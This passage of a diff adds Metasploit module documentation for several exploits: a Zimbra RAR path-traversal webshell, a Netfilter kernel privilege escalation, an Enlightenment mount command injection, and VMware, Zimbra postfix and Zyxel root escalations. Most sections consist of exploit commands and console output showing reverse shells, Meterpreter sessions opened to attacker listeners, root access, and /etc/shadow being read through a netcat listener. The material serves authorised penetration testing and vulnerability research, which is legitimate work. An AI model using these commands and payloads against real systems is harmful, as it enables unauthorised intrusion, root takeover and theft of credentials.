+[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+[+] File created! Email the file above to any user on the target Zimbra server
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[...] waiting [...]
+```
+
+Then, email that file to any user (including a non-existent mailbox) on the Zimbra server. Once the payload arrives at Zimbra, Zimbra should try to extract it to check for malware with no user interaction. Metasploit should see the malicious file extracted and get a session:
+
+```
+[...]
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Trying to trigger the backdoor @ public/lnijw.jsp...
+[*] Sending stage (3020772 bytes) to 10.0.0.154
+[+] Deleted ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/lnijw.jsp
+[*] Meterpreter session 1 opened (10.0.0.146:4444 -> 10.0.0.154:39710) at 2022-07-27 13:18:03 -0700
+
+meterpreter > getuid
+Server username: zimbra
+```
+
+## Options
+
+### `FILENAME`
+
+The filename to generate - defaults to `payload.rar`, but can be changed on the filesystem or whatever.
+
+### `TARGET_PATH`
+
+The path (traversal included) where the payload will extract to. The default is the webroot, which is usually pretty safe.
+
+### `TARGET_FILENAME`
+
+The actual filename. It really should end with `.jsp`, otherwise it won't execute.
+
+By default, it's a random string with `.jsp` on the end. That should work fine, especially because we can't overwrite files and don't want to use the same payload name more than once.
+
+### `TRIGGER_PAYLOAD`
+
+A boolean, default `true`, that determines whether we use HTTP requests to trigger the .jsp payload. Set to `false` to trigger the payload manually.
+
+### `ListenerTimeout`
+
+The number of seconds to wait for a new session (default = `0`, or infinite).
+
+### `CheckInterval`
+
+The frequency with which to check for the payload on the server. Every `CheckInterval`, it performs an HTTP request to the payload path.
@@ -0,0 +1,149 @@
+## Vulnerable Application
+
+This module exploits a vulnerability in Netfilter, the Linux Kernel component
+that implements firewall capabilities in Linux.
+The vulnerability is a type-confusion bug that leads to a heap overflow in kernel memory.
+The exploit relies on spraying, it may fail, or crash the target system.
+
+### Install
+
+The vulnerability exists in linux kernel versions from `5.8-rc1` up to `v5.19-rc5`.
+this module contains offsets for some vulnerable Ubuntu versions.
+
+Install Ubuntu 22.04 LTS with a vulnerable kernel version.
+`apt-get install linux-image-5.15.0-25-generic`
+Hold shift when you reboot and select the proper kernel version
+
+## Verification Steps
+
+1. Make an Ubuntu target.
+1. Create a Meterpreter or shell payload and upload it to the Ubuntu target. Or setup openssh-server, and use the corresponding auxiliary module.
+1. Get a session
+1. Do: `use exploit/linux/local/netfilter_nft_set_elem_init_privesc`
+1. Do: `set session <session_id>`
+1. Do: `set payload <payload>`
+1. Do: `set lhost <ip>`
+1. Do: `set [r|l]port <port>`
+1. Do: `run`
+1. You should get a new session as the `root` user.
+1. If it fails, retry, or reboot Ubuntu and retry.
+
+## Options
+
+### COMPILE
+
+[Auto|True|False] This selects the binary to use. `True` will cause the module to upload the source
+code and perform compilation on target, `False` will cause the module to upload a precompiled binary.
+`Auto` will cause the module to try compiling the exploit on the target but will fall back to the
+precompiled option if a compiler cannot be found.
+
+### WritableDir
+
+This indicates the location where you would like the payload and exploit binary stored.
+The default value is `/tmp`
+
+Due to the exploitation strategy that this module relies on, `/tmp` must be writable, even if
+`WritableDir` is a different directory. `modprobe_path` gets overwritten with a path to a file
+in `/tmp`. This file is a bash script that adds the setuid bit to the payload uploaded at
+`WritableDir`.
+
+## Scenarios
+
+### Ubuntu 21.10 x64 With Linux 5.13.0.37-Generic
+
+```
+msf6 > use auxiliary/scanner/ssh/ssh_login
+msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.0.40
+rhosts => 192.168.0.40
+msf6 auxiliary(scanner/ssh/ssh_login) > set username redouane
+username => redouane
+msf6 auxiliary(scanner/ssh/ssh_login) > set password user
+password => user
+msf6 auxiliary(scanner/ssh/ssh_login) > run
+
+[*] 192.168.0.40:22 - Starting bruteforce
+[+] 192.168.0.40:22 - Success: 'redouane:user' 'uid=1000(redouane) gid=1000(redouane) groupes=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux hopeful-zhukovky 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.0.32:46499 -> 192.168.0.40:22) at 2022-07-22 02:44:56 +0200
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/netfilter_nft_set_elem_init_privesc
+[*] Using configured payload linux/x64/shell_reverse_tcp
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set lhost wlan0
+lhost => wlan0
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > set session 1
+session => 1
+msf6 exploit(linux/local/netfilter_nft_set_elem_init_privesc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.0.32:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Dropping pre-compiled binaries to system...
+[*] Writing '/tmp/z9G2XJ' (761240 bytes) ...
+[*] Uploading payload...
+[*] Writing '/tmp/AsfKz' (248 bytes) ...
+[*] Running payload on remote system...
+[+] Deleted /tmp/z9G2XJ
+[+] Deleted /tmp/AsfKz
+[*] Command shell session 2 opened (192.168.0.32:4444 -> 192.168.0.40:35956) at 2022-07-22 02:45:54 +0200
+
+id
+[*] Payload executed! If it was successful, a session should have been created
+
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+```
+
+## Notes
+
+### Included Binaries
+The binary used by this exploit `data/exploits/CVE-2022-34918/ubuntu.elf` can be used separately from
+Metasploit. The binary takes a single argument which is the payload or executable you wish to launch as `root`.
+
+The exploit adds the setuid bit to the payload, the path given must be absolute, avoid binaries that don't run
+when the setuid bit is detected.
+
+Also, the exploit process forks, gets its child to execute the setuid payload binary, and exits
+(it doesn't call `wait` or `waitpid`). For this reason, don't expect the binary to read input from standard input.
+
+The following snippet shows an example of how one might run a payload to get
+a new Bash shell as the `root` user.
+
+```
+redouane@wizardly-maxwell:~$ id
+uid=1000(redouane) gid=1000(redouane) groups=1000(redouane),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare)
+redouane@wizardly-maxwell:~$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 PrependSetresuid=true PrependSetresgid=true -f elf -o payload
+[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
+[-] No arch selected, selecting arch: x64 from the payload
+No encoder specified, outputting raw payload
+Payload size: 96 bytes
+Final size of elf file: 216 bytes
+Saved as: payload
+redouane@wizardly-maxwell:~$ chmod +x payload
+redouane@wizardly-maxwell:~$ (echo id; head -n 2 /etc/shadow) | nc -lvvp1337 &
+[1] 2272
+redouane@wizardly-maxwell:~$ Listening on 0.0.0.0 1337
+
+redouane@wizardly-maxwell:~$ ./ubuntu.elf /home/redouane/payload
+[+] kernel version '5.15.0-25-generic #25-Ubuntu' detected
+[+] Second process currently waiting
+[+] Get CAP_NET_ADMIN capability
+[+] Netlink socket created
+[+] Netlink socket bound
+[+] Table table created
+[+] Set for the leak created
+[+] Set for write primitive created
+[*] Leak in process
+[+] Leak succeed
+[+] kaslr base found 0xffffffff9f000000
+[+] physmap base found 0xffff910a00000000
+[+] modprobe path changed !
+[+] Modprobe payload setup
+[?] waitpid
+[?] sem_post
+[+++] Got root shell, should exit?
+Connection received on localhost 56962
+uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare),1000(redouane)
+root:!:19193:0:99999:7:::
+daemon:*:19101:0:99999:7:::
+```
@@ -0,0 +1,124 @@
+## Vulnerable Application
+
+This module exploits a command injection within Enlightenment's
+`enlightenment_sys` binary. This is done by calling the mount
+command and feeding it paths which meet all of the system
+requirements, but execute a specific path as well due to a
+semi-colon being used.
+This module was tested on Ubuntu 22.04.1 X64 Desktop with
+enlightenment 0.25.3-1 (current at module write time)
+
+### Install
+
+At the time of writing, it was possible to `apt install enlightenment` to
+get a vulnerable version.
+
+### Main Command Explanation
+
+The main exploit command will look similar to the following (using `/tmp/exploit` as the payload path example):
+
+`/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net`
+
+This can be broken down in to several parts:
+
+1. `/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys`
+2. `/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u)`
+3. `"/dev/../tmp/;/tmp/exploit"`
+4. `/tmp///net`
+
+The first part calls the vulnerable executable which has `suid` set to root.
+
+The second portion is a standard mount, command. `enlightenment_sys` has a fork in the code
+for `mount`, which has the vulnerability in it.
+
+The third portion starts with `/dev/` to prevent the binary from exiting.  It is wrapped in
+double quotes, which are later removed by `enlightenment_sys` before running the command
+resulting in the command injection.
+
+Lastly `enlightenment_sys` checks that the last parameter is length 6, thus the extra `/`.
+It then calls `stat64` on `/tmp///net` and we pass that check.
+
+Now that all the checks have passed and the exploit code should go down the path to a `system`
+call. Again, the quotes are removed around `"/dev/../tmp/;/tmp/exploit"` , allowing for the `;`
+to be relevant and cause a command injection.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a userland shell
+4. Do: `use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc`
+5. Do: `set session #`
+6. Set payload and options for payload as needed
+7. Do: `run`
+8. You should get a root shell.
+
+## Options
+
+### WritableDir
+
+A directory which is writable to drop our payload in. Defaults to `/tmp`
+
+## Scenarios
+
+### Ubuntu 22.04.1 Desktop with Enlightenment 0.25.3-1
+
+Step 1, get a userland shell
+
+```
+resource (enlightenment.rb)> use auxiliary/scanner/ssh/ssh_login
+resource (enlightenment.rb)> set username ubuntu
+username => ubuntu
+resource (enlightenment.rb)> set password ubuntu
+password => ubuntu
+resource (enlightenment.rb)> set rhosts 192.168.2.31
+rhosts => 192.168.2.31
+resource (enlightenment.rb)> run
+[*] 192.168.2.31:22 - Starting bruteforce
+[+] 192.168.2.31:22 - Success: 'ubuntu:ubuntu' 'uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),122(lpadmin),134(lxd),135(sambashare) Linux ubuntu2204desktop 5.15.0-43-generic #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux '
+[*] SSH session 1 opened (192.168.2.199:35675 -> 192.168.2.31:22) at 2022-10-01 10:02:53 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+Step 2, run exploit
+
+```
+resource (enlightenment.rb)> use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+resource (enlightenment.rb)> set session 1
+session => 1
+resource (enlightenment.rb)> set verbose true
+verbose => true
+msf6 exploit(linux/local/ubuntu_enlightenment_mount_priv_esc) > run
+
+[!] SESSION may not be compatible with this module:
+[!]  * incompatible session architecture: 
+[*] Started reverse TCP handler on 192.168.2.199:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[+] The target appears to be vulnerable.
+[*] Finding enlightenment_sys
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Writing '/tmp/.7n09J2bt6' (250 bytes) ...
+[*] Max line length is 65537
+[*] Writing 250 bytes in 1 chunks of 735 bytes (octal-encoded), using printf
+[*] Creating folders for exploit
+[+] Found binary: /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
+[+] It's set for SUID
+[*] Launching exploit...
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045348 bytes) to 192.168.2.31
+[*] Meterpreter session 2 opened (192.168.2.199:4444 -> 192.168.2.31:54700) at 2022-10-01 10:03:12 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.2.31
+OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -0,0 +1,117 @@
+## Vulnerable Application
+VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of
+the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control
+is permitted via the sudo configuration without a password.
+
+### Setup
+
+To exploit this vulnerability in conjunction with CVE-2022-22954, follow [Installing and Configuring VMware Workspace
+ONE Access] or simply import the OVA into a **VMware hypervisor**. The target should be vulnerable to both
+vulnerabilities out of the box.
+
+The HW-150533, HW-154129, and HW-156875 patches may be optionally applied. In this case, a session will need to be
+opened by some means to the appliance as the `horizon` user in order to be exploitable. This is most easily accomplished
+by [resetting the root password], logging in locally, and then configuring SSH. Patches can be obtained from [VMware's
+Website]. Steps to reset the `root` password are available [here].
+
+[Installing and Configuring VMware Workspace ONE Access]: https://docs.vmware.com/en/VMware-Workspace-ONE-Access/21.08/workspace_one_access_install/GUID-0FABD001-050B-4A54-B100-2FA4E8F55613.html
+[VMware's Website]: https://customerconnect.vmware.com/en/downloads/details?downloadGroup=WS1A_ONPREM_210801&productId=1192&rPId=79985
+[resetting the root password]: https://kb.vmware.com/s/article/76530
+
+## Verification Steps
+
+1. Setup a vulnerable VMware instance (see the steps above).
+2. Start msfconsole.
+3. Obtain a session on the vulnerable instance.
+    * It is recommend to use either `exploit/linux/http/vmware_workspace_one_access_cve_2022_22954` if the target is
+      vulnerable to it or, alternatively, `exploit/multi/ssh/sshexec`.
+4. Do: `set SESSION -1`
+5. Optionally set the PAYLOAD and related options.
+6. Do: `run`
+7. If the target is vulnerable, the payload should be executed.
+
+## Options
+
+## Scenarios
+
+### VMware Workspace ONE Access 21.08.0.1
+In the following scenario, initial access is gained by first exploiting CVE-2022-22954. Once the session is opened, it
+is elevated to root by exploiting CVE-2022-31660.
+
+```
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options 
+
+Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.98   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      443              yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
+[*] Sending stage (40132 bytes) to 192.168.159.98
+[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400
+
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: horizon
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe 
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
+SESSION => -1
+msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
+
+[*] Started reverse TCP handler on 192.168.250.134:4444 
+[*] Backing up the original file...
+[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
+[*] Triggering the payload...
+[*] Sending stage (40132 bytes) to 192.168.250.237
+[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
+[*] Restoring file contents...
+[*] Restoring file permissions...
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : photon-machine
+OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > 
+```
@@ -0,0 +1,127 @@
+## Vulnerable Application
+
+Currently, as of 2022-10-14, all versions of Zimbra are vulnerable. Presumably
+they'll patch it eventually - I reported it to Zimbra.
+
+### Install Zimbra
+
+My steps to install Zimbra (adapted from Christophe):
+
+Create a VM with the following specs:
+
+```
+HDD = 128gb
+Memory/etc don't matter
+```
+
+Install a local DNS server (note: replace `<ip>` with the host's actual ip)
+(other note: replace `apt` with `yum` to do this on a Red Hat-derived system):
+
+```
+sudo apt update && sudo apt install dnsmasq
+sudo hostnamectl set-hostname mail.example.org
+echo "<ip> mail.example.org" | sudo tee -a /etc/hosts
+echo -e 'listen-address=127.0.0.1\nserver=8.8.8.8\ndomain=example.org\nmx-host=example.org, mail.example.org, 5\nmx-host=mail.example.org, mail.example.org, 5' | sudo tee /etc/dnsmasq.conf
+```
+
+Configure the host to use it:
+
+```
+sudo systemctl disable systemd-resolved
+sudo systemctl stop systemd-resolved
+sudo killall dnsmasq # Seems to be required for Red Hat OSes
+sudo systemctl restart dnsmasq
+echo "nameserver 127.0.0.1" | sudo tee /etc/resolv.conf
+```
+
+Download Zimbra from
+https://www.zimbra.com/downloads/zimbra-collaboration-open-source/ - you'll
+have to sell your soul and opt-in to spam, but they don't validate your email.
+
+```
+tar -xvvzf zcs-*.tgz
+cd zcs*
+sudo ./install.sh
+
+* Lots of <enter>
+* DO NOT install `dnscache` module (respond `N` when it ask), I had conflict issues with the local `dnsmasq`
+* Yes change the system
+* Setup the admin password, probably turn off auto-updates
+```
+
+## Verification Steps
+
+Get a Meterpreter session on the Zimbra server as the `zimbra` user - I used
+`exploit/linux/http/zimbra_cpio_cve_2022_41352` but just running a Meterpreter
+binary is also fine. To become vulnerable to cve-2022-41352, just `rm $(which pax)`
+then reboot.
+
+From there,
+
+You can obviously get a shell however you like. :)
+
+Then:
+
+1. Do: `use exploit/linux/local/zimbra_postfix_priv_esc`
+1. Do: `set SESSION 1`
+1. Do: `set RHOSTS <target>`
+1. Do: `set LHOST <listenerip>`
+1. Do: `exploit`
+
+## Options
+
+### SUDO_PATH
+
+The path to `sudo` on the host. If we have a proper environment with `$PATH`
+set, which we generally do, simply `sudo` is fine.
+
+### ZIMBRA_BASE
+
+The base where Zimbra is installed. Zimbra typically installs to `/opt/zimbra`,
+and I'm not even sure if it _can_ install elsewhere, so this default should be
+fine.
+
+### WritableDir
+
+A directory where we can write the payload - by default, `/tmp`.
+
+### PayloadFilename
+
+A specific filename to use as the payload, within `WritableDir`. By default,
+it's randomized (with a `.` in front)
+
+## Scenarios
+
+### Escalating a `zimbra` session to `root`, after exploiting cve-2022-41352
+
+```
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > sessions -l
+
+Active sessions
+===============
+
+  Id  Name  Type                   Information                Connection
+  --  ----  ----                   -----------                ----------
+  1         meterpreter x64/linux  zimbra @ mail.example.org  172.16.166.147:4444 -> 172.16.166.157:47210 (172.16.166.157)
+
+msf6 exploit(linux/http/zimbra_cpio_cve_2022_41352) > use exploit/linux/local/zimbra_postfix_priv_esc
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > set SESSION 1
+SESSION => 1
+msf6 exploit(linux/local/zimbra_postfix_priv_esc) > exploit
+
+[*] Started reverse TCP handler on 172.16.166.147:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[*] Executing: sudo -n -l
+[+] The target appears to be vulnerable.
+[*] Creating exploit directory: /tmp/.GPjXSraCDY
+[*] Writing '/tmp/.GPjXSraCDY/.qjSY8' (250 bytes) ...
+[*] Attempting to trigger payload: sudo /opt/zimbra/common/sbin/postfix -D -v /tmp/.GPjXSraCDY/.qjSY8
+[*] Sending stage (3045348 bytes) to 172.16.166.157
+[+] Deleted /tmp/.GPjXSraCDY
+[*] Meterpreter session 5 opened (172.16.166.147:4444 -> 172.16.166.157:36488) at 2022-10-14 13:19:25 -0700
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,198 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits CVE-2022-30526, a local privilege escalation vulnerability that
+allows a low privileged user (e.g. `nobody`) escalate to root. The issue stems from
+a suid binary that allows all users to copy files as `root`. This module overwrites
+the firewall's crontab to execute an attacker provided script, resulting in code
+execution as `root`.
+
+In order to use this module, the attacker must first establish shell access. For
+example, by exploiting CVE-2022-30525.
+
+Known affected Zyxel models are:
+
+* USG FLEX 50, 50W, 100W, 200, 500, 700
+* ATP 100, 200, 500, 700, 800
+* VPN 50, 100, 300, 1000
+* USG20-VPN and USG20W-VPN
+
+### Setup
+
+The vulnerable system is a hardware firewall/vpn that, to our knowledge,
+cannot be emulated. As such, testing requires a physical device. Once the
+device has been acquired, you'll need to accomplish the following:
+
+* Once powered on, register the device with Zyxel. You cannot do anything
+with the device until this is accomplished. Fortunately, the web interface
+will force you to complete this process. You'll need to create an account at
+https://portal.myzyxel.com and the firewall will need internet connectivity
+to complete the process.
+
+* Once the device is up to date, you'll need to downgrade the firmware. From
+portal.myzyxel.com you can download old firmware from:
+
+Devices Management -> Firmware Download
+
+From there you can select model and version to download. The last vulnerable
+version from the affected systems is 5.21 Patch 1.
+
+* Once you are using the vulnerable version, there is no special configuration
+you need to exploit from the LAN. If you want to exploit from the WAN, you'll
+need to enable "HTTP" and/or "HTTPS" through the firewall. From the web interface
+do:
+
+Configuration -> Objects -> Service -> Service Group -> Default_Allow_WAN_To_ZyWALL
+
+And move "HTTP" and/or "HTTPS" from the left column to the right. After applying
+the firewall should pass HTTP/HTTPS through the firewall to the web interface.
+
+* That's it. You are good to go.
+
+## Verification Steps
+
+* Follow setup steps above.
+* Establish a shell on the device. See `exploit/linux/http/zyxel_ztp_rce`
+* Do: `use exploit/linux/local/zyxel_suid_cp_lpe`
+* Do: `check`
+* Verify the remote host is exploitable
+* Do: `set LHOST <ip>`
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+## Scenarios
+
+### Successful escalation to root bash shell on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[+] Deleted /tmp/bJUQqm
+[*] Resetting crontab to the original version
+[+] Deleted /tmp/IcNlzvnv5
+[*] Command shell session 2 opened (10.0.0.28:4444 -> 10.0.0.14:50829) at 2022-05-13 11:57:08 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
+```
+
+### Successful escalation to root Meterpreter on USG Flex 100 using firmware 5.21
+
+```
+msf6 > use exploit/linux/http/zyxel_ztp_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/zyxel_ztp_rce) > set RHOST 10.0.0.14
+RHOST => 10.0.0.14
+msf6 exploit(linux/http/zyxel_ztp_rce) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/http/zyxel_ztp_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. This was determined by the model and build date: USG FLEX 100, 220315042158
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Sending command to /ztp/cgi-bin/handler
+[*] Command shell session 1 opened (10.0.0.28:4444 -> 10.0.0.14:50827) at 2022-05-13 11:55:47 -0700
+[+] Command successfully executed.
+
+id
+uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
+cat /zyinit/fwversion
+KERNEL_VERSION=3.10.87
+FIRMWARE_VER=5.21(ABUH.1)521-r103462-k3
+CAPWAP_VER=1.00.04
+COMPATIBLE_PRODUCT_MODEL_0=E15D
+COMPATIBLE_PRODUCT_MODEL_1=FFFF
+COMPATIBLE_PRODUCT_MODEL_2=FFFF
+COMPATIBLE_PRODUCT_MODEL_3=FFFF
+COMPATIBLE_PRODUCT_MODEL_4=FFFF
+MODEL_ID=USG FLEX 100
+KERNEL_BUILD_DATE=2022-03-15 03:18:23
+BUILD_DATE=2022-03-15 05:14:23
+FSH_VER=1.0.0
+^Z
+Background session 1? [y/N]  y
+msf6 exploit(linux/http/zyxel_ztp_rce) > use exploit/linux/local/zyxel_suid_cp_lpe
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set LHOST 10.0.0.28
+LHOST => 10.0.0.28
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set session 1
+session => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > set target 1
+target => 1
+msf6 exploit(linux/local/zyxel_suid_cp_lpe) > run
+
+[*] Started reverse TCP handler on 10.0.0.28:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. System version: USG FLEX 100, 5.21(ABUH.1)521-r103462-k3
+[*] Executing Linux Dropper for linux/mips64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.28:8080/0g5aPNZ8DvT1n
+[*] Overwriting /var/zyxel/crontab
+[*] The payload may take up to 60 seconds to be executed by cron
+[*] Client 10.0.0.14 (curl/7.70.0) requested /0g5aPNZ8DvT1n
+[*] Sending payload to 10.0.0.14 (curl/7.70.0)
+[+] Deleted /tmp/hdpBYBRk
+[+] Deleted /tmp/OpTYd0c0
+[*] Meterpreter session 3 opened (10.0.0.28:4444 -> 10.0.0.14:50832) at 2022-05-13 12:00:01 -0700
+[*] Command Stager progress - 100.00% done (115/115 bytes)
+[*] Resetting crontab to the original version
+[*] Server stopped.
+
+meterpreter > shell
+Process 29664 created.
+Channel 1 created.
+id
